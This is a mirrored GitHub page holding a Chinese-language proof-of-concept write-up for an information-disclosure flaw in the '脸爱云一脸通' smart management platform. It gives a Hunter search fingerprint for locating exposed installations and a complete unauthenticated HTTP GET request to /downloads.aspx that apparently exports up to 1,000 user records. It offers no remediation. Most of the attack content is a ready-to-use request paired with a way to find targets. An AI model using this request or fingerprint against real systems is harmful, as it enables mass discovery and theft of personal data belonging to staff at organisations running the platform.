crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 19:04:52 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

2.1 KiB
Raw Permalink Blame History

脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞

一、漏洞简介

脸爱云一脸通智慧管理平台是一套功能强大运行稳定操作简单方便用户界面美观轻松统计数据的一脸通系统。无需安装只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台downloads存在信息泄露漏洞。

二、影响版本

  • 脸爱云一脸通智慧管理平台

三、资产测绘

  • hunterweb.icon=="4f0be080512ee0b45fc90ff894b6ba60"
  • 特征

1700642739314-bb174ac2-c85b-471b-90e8-ed6c02ba5c28.png

四、漏洞复现

GET /downloads.aspx?Ename=UserInfo&total=1000&jsonParam={%22rybh%22:%22%22,%22ryxm%22:%22%22,%22EngName%22:%22%22,%22groupname%22:%22%22,%22companyname%22:%22%22,%22bmmc%22:%22%22,%22ryzt%22:%22%22,%22rzstartime%22:%22%22,%22rzendtime%22:%22%22,%22lzstartime%22:%22%22,%22lzendtime%22:%22%22,%22zhiwu%22:%22%22,%22cardid%22:%22%22,%22rfzt%22:%22%22,%22klb%22:%22%22,%22sxstartime%22:%22%22,%22sxendtime%22:%22%22,%22khstartime%22:%22%22,%22khendtime%22:%22%22,%22rfoperator%22:%22%22,%22rfstartime%22:%22%22,%22rfendtime%22:%22%22,%22feat%22:%22%22} HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

1714289513778-bfcc1b6d-0d32-422d-90f6-64868d76dc93.png

1714289539725-6727a5dd-f8c7-49a6-9297-493ce0cdb52d.png

更新: 2024-04-28 15:34:16
原文: https://www.yuque.com/xiaokp7/ocvun2/lim8z4ebk4m2ztoh